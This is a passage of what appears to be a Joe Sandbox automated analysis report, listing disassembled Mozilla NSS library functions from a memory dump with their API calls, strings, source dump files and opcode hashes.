Instruction Fuzzy Hash: 5701C0B6A00104AFDF11AF64ED8989B3F3CEF46368B004074FD19A7701D631EE1086A2

Function 6C774D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C774DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C774DE0

Strings

API call with %s database connection pointer, xrefs: 6C774DBD
misuse, xrefs: 6C774DD5
invalid, xrefs: 6C774DB8
%s at line %d of [%.10s], xrefs: 6C774DDA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C774DCB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 5cae45f288c2f1c76c82e17900fc613276ff80b84d67addd061b12711d9b67e8
Instruction ID: 2d084cb149539b885f0dd416a1eb3ede1e356a9c6da0f17faebbd3efa6802a6f
Opcode Fuzzy Hash: 5cae45f288c2f1c76c82e17900fc613276ff80b84d67addd061b12711d9b67e8
Instruction Fuzzy Hash: EDF02412F0452C2BEA104015DF16F9337594F02329F4709B0EF886BB52D205AD5096A4

Function 6C774DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C774E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C774E4D

Strings

API call with %s database connection pointer, xrefs: 6C774E2A
misuse, xrefs: 6C774E42
invalid, xrefs: 6C774E25
%s at line %d of [%.10s], xrefs: 6C774E47
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C774E38

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 0ff99cfbd331ed5c95202ff4458abab935e685c0fa73642f41c32380441596a5
Instruction ID: 418da4aa7d41daa4a257d091e7ea2b4901e0b30c767445e2c1874b9373c03098
Opcode Fuzzy Hash: 0ff99cfbd331ed5c95202ff4458abab935e685c0fa73642f41c32380441596a5
Instruction Fuzzy Hash: 6BF09711E4482C6BEE3000219F10F93379D4B0233AF4A8CF0EE4827E82D345AA7066F5

Function 6C6E0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C6E1444,?,00000001,?,00000000,00000000,?,?,6C6E1444,?,?,00000000,?,?), ref: 6C6E0CB3

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C6E1444,?,00000001,?,00000000,00000000,?,?,6C6E1444,?), ref: 6C6E0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C6E1444,?,00000001,?,00000000,00000000,?,?,6C6E1444,?), ref: 6C6E0DEC

Part of subcall function 6C700F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C6A2AF5,?,?,?,?,?,6C6A0A1B,00000000), ref: 6C700F1A
Part of subcall function 6C700F10: malloc.MOZGLUE(00000001), ref: 6C700F30
Part of subcall function 6C700F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C700F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C6E1444,?,00000001,?,00000000,00000000,?), ref: 6C6E0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C6E1444,?,00000001,?,00000000), ref: 6C6E0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C6E1444,?,00000001,?,00000000,00000000,?), ref: 6C6E0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C6E1444,?,00000001,?,00000000,00000000,?,?,6C6E1444,?,?,00000000), ref: 6C6E0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C6E1444,?,00000001,?,00000000,00000000,?), ref: 6C6E0E79

Part of subcall function 6C6F1560: TlsGetValue.KERNEL32(00000000,?,6C6C0844,?), ref: 6C6F157A
Part of subcall function 6C6F1560: EnterCriticalSection.KERNEL32(?,?,?,6C6C0844,?), ref: 6C6F158F
Part of subcall function 6C6F1560: PR_Unlock.NSS3(?,?,?,?,6C6C0844,?), ref: 6C6F15B2

Part of subcall function 6C6BB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C6C1397,00000000,?,6C6BCF93,5B5F5EC0,00000000,?,6C6C1397,?), ref: 6C6BB1CB
Part of subcall function 6C6BB1A0: free.MOZGLUE(5B5F5EC0,?,6C6BCF93,5B5F5EC0,00000000,?,6C6C1397,?), ref: 6C6BB1D2

Part of subcall function 6C6B89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6B88AE,-00000008), ref: 6C6B8A04
Part of subcall function 6C6B89E0: EnterCriticalSection.KERNEL32(?), ref: 6C6B8A15
Part of subcall function 6C6B89E0: memset.VCRUNTIME140(6C6B88AE,00000000,00000132), ref: 6C6B8A27
Part of subcall function 6C6B89E0: PR_Unlock.NSS3(?), ref: 6C6B8A35

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: b3f5ed36f2fd74f770ab33b9619a235c9e340f21abc03565053c307f7357ac64
Instruction ID: ceb60d08f104880d336d695f8ec9ca91e14dea3dd3774c3e15e2da288b1ff689
Opcode Fuzzy Hash: b3f5ed36f2fd74f770ab33b9619a235c9e340f21abc03565053c307f7357ac64
Instruction Fuzzy Hash: F051C7B5E012005FEB009F64DC85AAB37A8EF4A318F150075ED1997712FB31ED1997AA

Function 6C696E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C696ED8
sqlite3_value_text.NSS3(?,?), ref: 6C696EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C696FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C696FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C696FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C697010
sqlite3_value_blob.NSS3(?,?), ref: 6C69701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C697052

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 6867868a5e33e2c7a5124981650b43120c16f830775da2d51cc753b011839cf5
Instruction ID: 1930dfe06e4401bf0d8c644024d0ea253aa38b6f207239d740afc7e7b4998534
Opcode Fuzzy Hash: 6867868a5e33e2c7a5124981650b43120c16f830775da2d51cc753b011839cf5
Instruction Fuzzy Hash: 8E61E4B1E0420B8FDB40CF65C9447EEB7B2AF45308F284165D816ABB50E736DC16CB98

Function 6C6E88E0 Relevance: 12.1, APIs: 8, Instructions: 112COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6E88FC

Part of subcall function 6C6FBE30: SECOID_FindOID_Util.NSS3(6C6B311B,00000000,?,6C6B311B,?), ref: 6C6FBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C6E8913

Part of subcall function 6C700FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6A87ED,00000800,6C69EF74,00000000), ref: 6C701000
Part of subcall function 6C700FF0: PR_NewLock.NSS3(?,00000800,6C69EF74,00000000), ref: 6C701016
Part of subcall function 6C700FF0: PL_InitArenaPool.NSS3(00000000,security,6C6A87ED,00000008,?,00000800,6C69EF74,00000000), ref: 6C70102B

SEC_ASN1DecodeItem_Util.NSS3(00000000,?,6C7CD864,?), ref: 6C6E8947

Part of subcall function 6C6FE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C6FE245
Part of subcall function 6C6FE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C6FE254

SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C6E895B
DER_GetInteger_Util.NSS3(?), ref: 6C6E8973
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6E8982
SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6E89EC
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C6E8A12

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena_Tag_$AlgorithmErrorFindFree$ArenaDecodeInitInteger_Item_LockPoolcalloc
String ID:
API String ID: 2145430656-0
Opcode ID: 4bf874422142dde80909c2c3bbe3aaa53670ad6bd6edc4d9443b1788aa402c7d
Instruction ID: 7671cc0f44dc13a12b2719200c45ad501ffb6b876570f3149780b8a6565887ac
Opcode Fuzzy Hash: 4bf874422142dde80909c2c3bbe3aaa53670ad6bd6edc4d9443b1788aa402c7d
Instruction Fuzzy Hash: 8D3167B1E0E60057F710422DAC457EA36959F9D32CF240637D929D7AE1FB22C44A828B

Function 6C7B0860 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

PR_LogFlush.NSS3(00000000,00000000,?,?,6C7B7AE2,?,?,?,?,?,?,6C7B798A), ref: 6C7B086C

Part of subcall function 6C7B0930: EnterCriticalSection.KERNEL32(?,00000000,?,6C7B0C83), ref: 6C7B094F
Part of subcall function 6C7B0930: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C7B0C83), ref: 6C7B0974
Part of subcall function 6C7B0930: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C7B0983
Part of subcall function 6C7B0930: _PR_MD_UNLOCK.NSS3(?,?,6C7B0C83), ref: 6C7B099F

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,00000000,?,?,6C7B7AE2,?,?,?,?,?,?,6C7B798A), ref: 6C7B087D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,6C7B7AE2,?,?,?,?,?,?,6C7B798A), ref: 6C7B0892
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,6C7B798A), ref: 6C7B08AA
free.MOZGLUE(?,00000000,00000000,?,?,6C7B7AE2,?,?,?,?,?,?,6C7B798A), ref: 6C7B08C7
free.MOZGLUE(?,00000000,00000000,?,?,6C7B7AE2,?,?,?,?,?,?,6C7B798A), ref: 6C7B08E9
free.MOZGLUE(?,6C7B7AE2,?,?,?,?,?,?,6C7B798A), ref: 6C7B08EF
PR_DestroyLock.NSS3(?,00000000,00000000,?,?,6C7B7AE2,?,?,?,?,?,?,6C7B798A), ref: 6C7B090E

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: free$__acrt_iob_func$CriticalDestroyEnterFlushLockSectionfclosefflushfwrite
String ID:
API String ID: 3145526462-0
Opcode ID: f19f37b47e97ec1efce3a29065b4c2f59cd73a95f92a2073d865b98b444336fb
Instruction ID: a8d6ed750d8f4ea672e6391b4cc8fda36423bbd44311f273a8e683852084075b
Opcode Fuzzy Hash: f19f37b47e97ec1efce3a29065b4c2f59cd73a95f92a2073d865b98b444336fb
Instruction Fuzzy Hash: 2F1133F1B012404BFF209F55DE8674A3778AB4126DF190138E42567A41DB72E954CBD2

Function 6C728D20 Relevance: 10.8, APIs: 7, Instructions: 290memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD002,00000000), ref: 6C728E19
free.MOZGLUE(?), ref: 6C728E2D
PORT_Alloc_Util.NSS3(?), ref: 6C728F01
memcpy.VCRUNTIME140(?,?,?), ref: 6C728F57
free.MOZGLUE(?), ref: 6C728F7D
PR_GetCurrentThread.NSS3 ref: 6C728F8A
PR_SetError.NSS3(FFFFD044,00000000), ref: 6C7290D6

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Errorfree$Alloc_CurrentThreadUtilmemcpy
String ID:
API String ID: 4163001165-0
Opcode ID: 0ed17855e8d3255e53fa78a6453ed2dbde9d2259719a940a219aa290ebb674dc
Instruction ID: 99c0641e5abe7803b1d70d591d16b7bc3ffa8ac53a7849c82eaf4f7632ea337d
Opcode Fuzzy Hash: 0ed17855e8d3255e53fa78a6453ed2dbde9d2259719a940a219aa290ebb674dc
Instruction Fuzzy Hash: 9DA1D772A043019BE710CF24CE45BABB3E9EF54308F04497DE9599B752E73AE648C792

Function 6C718C10 Relevance: 10.8, APIs: 7, Instructions: 279COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C718C93

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

Part of subcall function 6C6F8A60: TlsGetValue.KERNEL32(6C6A61C4,?,6C6A5F9C,00000000), ref: 6C6F8A81
Part of subcall function 6C6F8A60: TlsGetValue.KERNEL32(?,?,?,6C6A5F9C,00000000), ref: 6C6F8A9E
Part of subcall function 6C6F8A60: EnterCriticalSection.KERNEL32(?,?,?,?,6C6A5F9C,00000000), ref: 6C6F8AB7
Part of subcall function 6C6F8A60: PR_Unlock.NSS3(?,?,?,?,?,6C6A5F9C,00000000), ref: 6C6F8AD2

memset.VCRUNTIME140(?,00000000,?), ref: 6C718CFB
memset.VCRUNTIME140(?,00000000,?), ref: 6C718D10

Part of subcall function 6C6F8970: TlsGetValue.KERNEL32(?,00000000,6C6A61C4,?,6C6A5639,00000000), ref: 6C6F8991
Part of subcall function 6C6F8970: TlsGetValue.KERNEL32(?,?,?,?,?,6C6A5639,00000000), ref: 6C6F89AD
Part of subcall function 6C6F8970: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6A5639,00000000), ref: 6C6F89C6
Part of subcall function 6C6F8970: PR_WaitCondVar.NSS3 ref: 6C6F89F7
Part of subcall function 6C6F8970: PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6A5639,00000000), ref: 6C6F8A0C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockmemset$CondErrorWait
String ID:
API String ID: 2412912262-0
Opcode ID: a30a9e6c7e1e62c25b37be6407898e546aa0f0963f040a64a889fbe8662e7e31
Instruction ID: 907bd9b449bc73d8b0f1c9f5f2d59409bd583b92c964f7a93c3332fdfd6214b5
Opcode Fuzzy Hash: a30a9e6c7e1e62c25b37be6407898e546aa0f0963f040a64a889fbe8662e7e31
Instruction Fuzzy Hash: 8AB1BFB0D043089FDB04CF65CD84AAEB7BAFF49308F14412EE81AA7B52E731A955CB54

Function 6C624F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C624FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6251BB

Strings

misuse, xrefs: 6C6251AF
unable to delete/modify user-function due to active statements, xrefs: 6C6251DF
%s at line %d of [%.10s], xrefs: 6C6251B4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6251A5

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: c20b59f1c30d451ed96ea3821acfc0791be611bad743708d839bc2945b2b7f48
Instruction ID: ef279bce2f56f83390e4ea7c68b10c61eca9518b43f02bab4ff13105945e7924
Opcode Fuzzy Hash: c20b59f1c30d451ed96ea3821acfc0791be611bad743708d839bc2945b2b7f48
Instruction Fuzzy Hash: 8A71BD7170420A9BEB10CE15CD84BEAB7B5BF88308F058524FD199BA89D339ED54CFA5

Function 6C7129E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6C7121DD,00000000), ref: 6C712A47
SEC_ASN1EncodeInteger_Util.NSS3(?,6C7121DD,00000002,00000000,00000000,?,?,6C7121DD,00000000), ref: 6C712A60
SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6C7121DD,00000000), ref: 6C712A8E
PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C712AE9
PORT_ArenaMark_Util.NSS3(00000000), ref: 6C712B0D
PK11_FreeSymKey.NSS3(?), ref: 6C712B7B
PK11_FreeSymKey.NSS3(?), ref: 6C712BD6

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID:
API String ID: 1625981074-0
Opcode ID: d1fb9789886de3087ea85d223f4824158150aee924952b90f148452a2cf5ffe8
Instruction ID: d9f05bec94041d53d473af20a32817970a4c42e44201df47e6ff14c5e9c56b11
Opcode Fuzzy Hash: d1fb9789886de3087ea85d223f4824158150aee924952b90f148452a2cf5ffe8
Instruction Fuzzy Hash: 4C515B71E042059BEB108F65DD89BAB37B5AF0632CF190138ED195BB81F731E905C791

Function 6C6EAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C6EAB3E,?,?,?), ref: 6C6EAC35

Part of subcall function 6C6CCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C6CCF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C6EAB3E,?,?,?), ref: 6C6EAC55

Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C7010F3
Part of subcall function 6C7010C0: EnterCriticalSection.KERNEL32(?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70110C
Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701141
Part of subcall function 6C7010C0: PR_Unlock.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701182
Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C6EAB3E,?,?), ref: 6C6EAC70

Part of subcall function 6C6CE300: TlsGetValue.KERNEL32 ref: 6C6CE33C
Part of subcall function 6C6CE300: EnterCriticalSection.KERNEL32(?), ref: 6C6CE350
Part of subcall function 6C6CE300: PR_Unlock.NSS3(?), ref: 6C6CE5BC
Part of subcall function 6C6CE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C6CE5CA
Part of subcall function 6C6CE300: TlsGetValue.KERNEL32 ref: 6C6CE5F2
Part of subcall function 6C6CE300: EnterCriticalSection.KERNEL32(?), ref: 6C6CE606
Part of subcall function 6C6CE300: PORT_Alloc_Util.NSS3(?), ref: 6C6CE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C6EAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6EAB3E), ref: 6C6EACD7
PORT_Alloc_Util.NSS3(?), ref: 6C6EAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C6EAD2B

Part of subcall function 6C6CF360: TlsGetValue.KERNEL32(00000000,?,6C6EA904,?), ref: 6C6CF38B
Part of subcall function 6C6CF360: EnterCriticalSection.KERNEL32(?,?,?,6C6EA904,?), ref: 6C6CF3A0
Part of subcall function 6C6CF360: PR_Unlock.NSS3(?,?,?,?,6C6EA904,?), ref: 6C6CF3D3

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

